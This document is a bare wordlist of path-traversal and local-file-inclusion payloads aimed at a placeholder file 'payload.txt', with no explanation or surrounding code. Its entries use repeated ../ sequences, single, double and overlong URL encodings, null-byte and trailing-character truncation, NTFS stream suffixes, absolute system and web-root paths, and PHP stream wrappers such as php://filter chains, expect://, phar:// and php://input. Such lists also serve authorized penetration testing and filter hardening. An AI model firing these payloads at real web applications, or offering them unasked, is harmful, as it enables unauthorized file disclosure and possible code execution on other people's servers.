payload.txt
./payload.txt
../payload.txt
../../payload.txt
../../../payload.txt
../../../../payload.txt
../../../../../payload.txt
../../../../../../payload.txt
../../../../../../../payload.txt
../../../../../../../../payload.txt
../../../../../../../../../payload.txt
../../../../../../../../../../payload.txt
../../../../../../../../../../../payload.txt
../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../../payload.txt
/payload.txt
/../payload.txt
/../../payload.txt
/../../../payload.txt
/../../../../payload.txt
/../../../../../payload.txt
/../../../../../../payload.txt
/../../../../../../../payload.txt
/../../../../../../../../payload.txt
/../../../../../../../../../payload.txt
/../../../../../../../../../../payload.txt
/../../../../../../../../../../../payload.txt
/../../../../../../../../../../../../payload.txt
/../../../../../../../../../../../../../payload.txt
/../../../../../../../../../../../../../../payload.txt
..//payload.txt
....//payload.txt
..../payload.txt
....\/payload.txt
....//....//payload.txt
....//....//....//payload.txt
....//....//....//....//payload.txt
....//....//....//....//....//payload.txt
..//////..//..//payload.txt
..\/..\/payload.txt
..\/..\/..\/payload.txt
..\/..\/..\/..\/payload.txt
..\/..\/..\/..\/..\/payload.txt
..//..//..//payload.txt
../..//..///../..//payload.txt
..\payload.txt
..\..\payload.txt
..\..\..\payload.txt
..\..\..\..\payload.txt
..\..\..\..\..\payload.txt
..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\..\..\..\..\payload.txt
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\payload.txt
..\/../payload.txt
../../..\..\/payload.txt
..\/../../payload.txt
..\/..\/../payload.txt
%2e%2e/payload.txt
%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%2e%2e%5cpayload.txt
%2e%2e%5c%2e%2e%5cpayload.txt
%2e%2e%5c%2e%2e%5c%2e%2e%5cpayload.txt
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cpayload.txt
%2e%2e/payload.txt
..%2fpayload.txt
%2e./payload.txt
.%2e/payload.txt
../%70ayload.txt
../payload%2etxt
%2e%2e%2f%70ayload.txt
%252e%252e/payload.txt
%252e%252e%252fpayload.txt
%252e%252e/%252e%252e/payload.txt
%252e%252e%252f%252e%252e%252fpayload.txt
%252e%252e/%252e%252e/%252e%252e/payload.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252fpayload.txt
%252e%252e/%252e%252e/%252e%252e/%252e%252e/payload.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpayload.txt
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/payload.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpayload.txt
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/payload.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpayload.txt
%252e%252e%255cpayload.txt
%252e%252e%255c%252e%252e%255cpayload.txt
%252e%252e%255c%252e%252e%255c%252e%252e%255cpayload.txt
%c0%2epayload.txt
%c0%2e%c0%2e/payload.txt
%c0%2e%c0%2e%c0%2fpayload.txt
%c0%2e%c0%2e/%c0%2e%c0%2e/payload.txt
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fpayload.txt
%c0%ae%c0%ae/payload.txt
%c0%ae%c0%ae%c0%afpayload.txt
%c0%ae%c0%ae/%c0%ae%c0%ae/payload.txt
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afpayload.txt
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/payload.txt
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afpayload.txt
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/payload.txt
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afpayload.txt
%e0%80%ae%e0%80%ae/payload.txt
%e0%80%ae%e0%80%ae%e0%80%afpayload.txt
%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/payload.txt
%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afpayload.txt
%2e%2e%2f%2e%2e%2f%2e%2e/payload.txt
../%2e%2e/%2e%2e/payload.txt
%2e%2e/../../payload.txt
..%2f..%2f../payload.txt
%2e%2e%5c%2e%2e/payload.txt
..%5c%2e%2e%2fpayload.txt
%252e./.%252e/payload.txt
.%252e/.%2e/payload.txt
%2e%252e/%2e./payload.txt
..%252f..%2f../payload.txt
%25%32%65%25%32%65%25%32%66payload.txt
%25%32%65%25%32%65/payload.txt
../payload.txt%00
../../payload.txt%00
../../../payload.txt%00
../../../../payload.txt%00
../../../../../payload.txt%00
../../../../../../payload.txt%00
../../../../../../../payload.txt%00
../../../../../../../../payload.txt%00
../../../../../../../../../payload.txt%00
../payload.txt%00.jpg
../../payload.txt%00.png
../../../payload.txt%00.pdf
../../../../payload.txt%00.html
../../../../../payload.txt%00.php
../payload.txt%2500
../../payload.txt%2500
../../../payload.txt%2500
../payload.txt%u0000
../../payload.txt%u0000
../../../payload.txt%u0000
../payload.txt............................................................
../../payload.txt...........................................................
../../../payload.txt........................................................
../payload.txt/./././././././././././././././././././././././././././././.
../../payload.txt/./././././././././././././././././././././././././././.
../payload.txt/////////////////////////////////////////////////////////
../../payload.txt//////////////////////////////////////////////////////
../payload.txt/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
php://filter/convert.base64-encode/resource=payload.txt
php://filter/convert.base64-encode/resource=../payload.txt
php://filter/convert.base64-encode/resource=../../payload.txt
php://filter/convert.base64-encode/resource=../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../../../../../payload.txt
php://filter/convert.base64-decode/resource=payload.txt
php://filter/convert.base64-decode/resource=../payload.txt
php://filter/convert.base64-decode/resource=../../payload.txt
php://filter/convert.base64-decode/resource=../../../payload.txt
php://filter/read=string.rot13/resource=payload.txt
php://filter/read=string.rot13/resource=../payload.txt
php://filter/read=string.rot13/resource=../../payload.txt
php://filter/read=string.rot13/resource=../../../payload.txt
php://filter/read=string.rot13/resource=../../../../payload.txt
php://filter/read=string.rot13/resource=../../../../../payload.txt
php://filter/read=string.rot13/resource=../../../../../../payload.txt
php://filter/convert.iconv.utf-8.utf-7/resource=payload.txt
php://filter/convert.iconv.utf-8.utf-7/resource=../payload.txt
php://filter/convert.iconv.utf-8.utf-7/resource=../../payload.txt
php://filter/convert.iconv.utf-8.utf-7/resource=../../../payload.txt
php://filter/convert.iconv.utf-8.utf-16/resource=payload.txt
php://filter/convert.iconv.utf-8.utf-16/resource=../payload.txt
php://filter/convert.iconv.utf-8.utf-16/resource=../../payload.txt
php://filter/convert.iconv.ISO-8859-1.UTF-8/resource=payload.txt
php://filter/convert.iconv.ISO-8859-1.UTF-8/resource=../payload.txt
php://filter/convert.base64-encode|convert.base64-decode/resource=payload.txt
php://filter/convert.base64-encode|convert.base64-decode/resource=../payload.txt
php://filter/read=string.rot13|string.rot13/resource=payload.txt
php://filter/read=string.rot13|string.rot13/resource=../payload.txt
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=payload.txt
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=../payload.txt
php://filter/convert.base64-encode|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=payload.txt
php://filter/string.toupper|string.tolower|string.rot13/resource=payload.txt
php://filter/string.strip_tags|convert.base64-encode/resource=../payload.txt
PHP://filter/convert.base64-encode/resource=payload.txt
Php://filter/convert.base64-encode/resource=../payload.txt
pHP://filter/convert.base64-encode/resource=../../payload.txt
php://FILTER/convert.base64-encode/resource=payload.txt
php://Filter/convert.base64-encode/resource=../payload.txt
php://filter/CONVERT.base64-encode/resource=payload.txt
php://filter/Convert.Base64-Encode/resource=payload.txt
pHp://FiLtEr/CoNvErT.bAsE64-EnCoDe/resource=payload.txt
php://input
php://stdin
php://stdout
php://stderr
php://memory
php://temp
data://text/plain;base64,payload.txt
data://text/plain,payload.txt
data:text/plain;base64,payload.txt
data:text/plain,payload.txt
expect://payload.txt
expect://../payload.txt
expect://../../payload.txt
expect://../../../payload.txt
zip://payload.txt
zip://../payload.txt
zip://../../payload.txt
zip://../../../payload.txt
zip://payload.zip#payload.txt
zip://../payload.zip#payload.txt
zip://../../payload.zip#payload.txt
phar://payload.txt
phar://../payload.txt
phar://../../payload.txt
phar://../../../payload.txt
phar://payload.phar/payload.txt
phar://../payload.phar/payload.txt
phar://../../payload.phar/payload.txt
glob://payload.txt
glob://../payload.txt
glob://../../payload.txt
glob://*payload.txt
glob://../*payload.txt
../?/../payload.txt
../../?/../../payload.txt
../?/..?/payload.txt
../??/../payload.txt
../#/../payload.txt
../../#/../../payload.txt
/payload.txt
/tmp/payload.txt
/var/payload.txt
/var/www/payload.txt
/var/www/html/payload.txt
/usr/local/payload.txt
/usr/share/payload.txt
/opt/payload.txt
/home/payload.txt
/root/payload.txt
/etc/payload.txt
/srv/payload.txt
/app/payload.txt
/data/payload.txt
/web/payload.txt
/www/payload.txt
/public/payload.txt
/public_html/payload.txt
/html/payload.txt
/htdocs/payload.txt
C:\payload.txt
C:\Windows\payload.txt
C:\inetpub\payload.txt
C:\inetpub\wwwroot\payload.txt
C:\xampp\htdocs\payload.txt
C:\wamp\www\payload.txt
C:\Program Files\payload.txt
D:\payload.txt
E:\payload.txt
\\payload.txt
\payload.txt
\\localhost\c$\payload.txt
\\127.0.0.1\c$\payload.txt
\\?\c:\payload.txt
\\.\c:\payload.txt
php://filter/resource=../payload.txt
php://filter/resource=../../payload.txt
php://filter/resource=../../../payload.txt
php://filter/read=string.rot13/resource=../../../../payload.txt
php://filter/read=string.rot13/resource=../../../../../payload.txt
php://filter/convert.base64-encode/resource=../../../../../../payload.txt
file://payload.txt
file://../payload.txt
file://../../payload.txt
file://../../../payload.txt
file://../../../../payload.txt
file://../../../../../payload.txt
%70%68%70://filter/resource=payload.txt
%70%68%70://filter/resource=../payload.txt
php%3A%2F%2Ffilter/resource=payload.txt
php%3A%2F%2Ffilter/resource=../payload.txt
php://%66ilter/resource=payload.txt
php://filte%72/resource=payload.txt
php://filter/resourc%65=payload.txt
php://filter/re%73ource=../payload.txt
../ /payload.txt
../../ /payload.txt
../%20/payload.txt
../../%20/payload.txt
../%09/payload.txt
../../%09/payload.txt
../%0a/payload.txt
../../%0a/payload.txt
../%0d/payload.txt
%u002e%u002e/payload.txt
%u002e%u002e%u002fpayload.txt
%uff0e%uff0e/payload.txt
%uff0e%uff0e%uff0fpayload.txt
....//....//payload.txt
....//....//....//payload.txt
....//....//....//....//payload.txt
..././..././payload.txt
..././..././..././payload.txt
..././..././..././..././payload.txt
..........//payload.txt
............//payload.txt
.............//payload.txt
/app/payload.txt
/app/public/payload.txt
/app/src/payload.txt
/usr/src/app/payload.txt
/usr/src/app/public/payload.txt
/code/payload.txt
/application/payload.txt
/workspace/payload.txt
/project/payload.txt
....//payload.txt
..../\payload.txt
....\/payload.txt
..../payload.txt#
../../payload.txt?
../../../payload.txt#dummy
../../../../payload.txt?dummy=1
/var/www/html/public/payload.txt
/var/www/html/storage/payload.txt
/var/www/html/uploads/payload.txt
/usr/share/nginx/html/payload.txt
/var/www/symfony/public/payload.txt
/var/www/laravel/storage/app/payload.txt
/var/www/laravel/public/payload.txt
php://filter/zlib.deflate/convert.base64-encode/resource=payload.txt
php://filter/zlib.inflate/convert.base64-decode/resource=payload.txt
php://filter/bzip2.compress/convert.base64-encode/resource=payload.txt
php://filter/bzip2.decompress/convert.base64-decode/resource=payload.txt
php://filter/convert.quoted-printable-encode/resource=payload.txt
php://filter/convert.quoted-printable-decode/resource=payload.txt
php://filter/string.strip_tags/resource=payload.txt
php://filter/string.toupper/resource=payload.txt
php://filter/string.tolower/resource=payload.txt
php://filter/convert.iconv.utf-8.utf-16le/resource=payload.txt
php://filter/convert.iconv.utf-8.utf-32le/resource=payload.txt
php://filter/convert.iconv.utf-16le.utf-8/resource=payload.txt
php://filter/convert.iconv.ISO-8859-1.UTF-7/resource=payload.txt
php://filter/convert.iconv.CP1252.UTF-8/resource=payload.txt
php://filter/convert.iconv.UCS-2.UTF-8/resource=payload.txt
php://filter/convert.iconv.UCS-4.UTF-8/resource=payload.txt
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=payload.txt
php://filter/convert.base64-encode|convert.base64-encode|convert.base64-decode/resource=payload.txt
php://filter/read=convert.base64-encode|convert.base64-encode|convert.base64-decode|convert.base64-decode/resource=payload.txt
file:///payload.txt
file:///./payload.txt
file:///../payload.txt
file:///../../payload.txt
file:///../../../payload.txt
file:///../../../../payload.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpayload.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpayload.txt
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afpayload.txt
..%c0%afpayload.txt
..%ef%bc%8fpayload.txt
..%c1%9cpayload.txt
%00../payload.txt
%00../../payload.txt
%00../../../payload.txt
%00../../../../payload.txt
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66payload.txt
%2525%32%65%2525%32%65%2525%32%66payload.txt
php://filter/resource=%2e%2e%2fpayload.txt
php://filter/resource=%2e%2e%2f%2e%2e%2fpayload.txt
php://filter/convert.base64-encode/resource=%2e%2e%2fpayload.txt
php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fpayload.txt
../Payload.txt
../PAYLOAD.TXT
../../Payload.txt
../../PAYLOAD.TXT
../../../Payload.txt
../PayLoad.txt
../PAYLOAD.txt
../../PayLoad.TXT
payload.txt:$DATA
../payload.txt:$DATA
../../payload.txt:$DATA
../../../payload.txt:$DATA
payload.txt::$DATA
../payload.txt::$DATA
../payload.txt?
../../payload.txt?
../../../payload.txt?
../payload.txt?.jpg
../../payload.txt?.png
../../../payload.txt?.php
../payload.txt%0a
../../payload.txt%0a
../payload.txt%0d
../../payload.txt%0d
../payload.txt%0d%0a
../../payload.txt%0d%0a
../../../../../../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../../../../../../../../payload.txt
../../../../../../../../../../../../../../../../../../../../../payload.txt
./././payload.txt
././././payload.txt
././././././payload.txt
../../././payload.txt
../../../././payload.txt
php://filter/write=string.rot13/resource=payload.txt
php://filter/write=convert.base64-decode/resource=payload.txt
php://filter/write=string.strip_tags/resource=payload.txt
%252e%252e%255c%252e%252e%255cpayload.txt
....\/....\/....\/payload.txt
php://filter/convert.iconv.UTF-8.CSISO2022KR/resource=../payload.txt
php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fpayload.txt
%70%68%70://filter/convert.base64-encode/resource=%2e%2e%2fpayload.txt
